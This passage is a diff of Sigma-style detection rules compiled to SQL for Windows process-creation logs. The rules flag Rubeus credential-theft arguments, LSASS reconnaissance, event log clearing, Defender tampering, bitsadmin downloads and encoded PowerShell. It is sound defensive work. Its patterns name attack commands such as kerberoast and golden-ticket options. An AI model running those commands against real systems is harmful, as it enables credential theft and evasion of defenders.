'%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Potential Defense Evasion Via Binary Rename", - "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", + "description": "Detects a suspicious RDP session redirect using tscon.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", + "title": "Potential Windows Defender Tampering Via Wmic.EXE", + "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" ], - "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "Suspicious VBoxDrvInst.exe Parameters", - "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", - "status": "test", - "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", - "author": "Konstantin Grishchenko, oscd.community", + "title": "Recon Information for Export with Command Prompt", + "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "status": "experimental", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tree.com' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\doskey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" + "filename": "proc_creation_win_susp_recon.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", - "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "status": "stable", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", + "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", + "status": "experimental", + "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.persistence", + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Installation of unsigned packages for testing purposes" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '% asreproast %' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% /impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "title": "Exploit for CVE-2017-0261", + "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "status": "test", + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_exploit_cve_2017_0261.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "title": "Suspicious SysAidServer Child", + "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" + }, + { + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate software creating script event consumers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", - "status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "PowerShell Base64 Encoded FromBase64String Keyword", - "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "title": "New Process Created Via Wmic.EXE", + "id": "526be59f-a573-4eea-b5f7-f0973207634d", "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects new process creation using WMIC via the \"process call create\" flag", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1140", "attack.execution", - "attack.t1059.001" + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE 